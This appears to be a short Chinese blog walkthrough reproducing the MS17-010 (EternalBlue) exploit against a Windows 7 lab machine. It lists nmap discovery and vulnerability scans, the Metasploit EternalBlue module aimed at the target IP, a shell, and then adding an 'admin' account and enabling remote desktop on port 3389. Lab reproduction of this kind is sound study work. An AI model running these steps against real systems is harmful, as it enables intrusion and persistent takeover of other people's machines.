MS17010(永恒之蓝)漏洞复现

MS17010(永恒之蓝)漏洞利用与复现

首先需要准备win7的环境做为靶机

获取信息

利用nmap扫描得到,靶机IP

nmap -sP 192.168.229.0/24

得到:
IP:192.168.229.169
MS17010(永恒之蓝)漏洞复现_第1张图片

然后利用:

nmap --script=vuln 192.168.229.169

得到靶机信息:

MS17010(永恒之蓝)漏洞复现_第2张图片

发现可能利用的漏洞:
ms17-010

然后启动msf

msfconsole

然后查找漏洞路径:

search ms17-010

MS17010(永恒之蓝)漏洞复现_第3张图片
使用payload进行攻击:

use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.229.169
run

MS17010(永恒之蓝)漏洞复现_第4张图片
然后输入:shell

MS17010(永恒之蓝)漏洞复现_第5张图片

然后在查看当前用户:

net user

MS17010(永恒之蓝)漏洞复现_第6张图片
发现用乱码可以用这个取消乱码:

chcp 65001

然后添加一个admin用户密码也为admin

MS17010(永恒之蓝)漏洞复现_第7张图片

然后开启3389端口:

MS17010(永恒之蓝)漏洞复现_第8张图片

然后在开启远程控制:

MS17010(永恒之蓝)漏洞复现_第9张图片

得到:

MS17010(永恒之蓝)漏洞复现_第10张图片

你可能感兴趣的:(sql,mysql,数据库)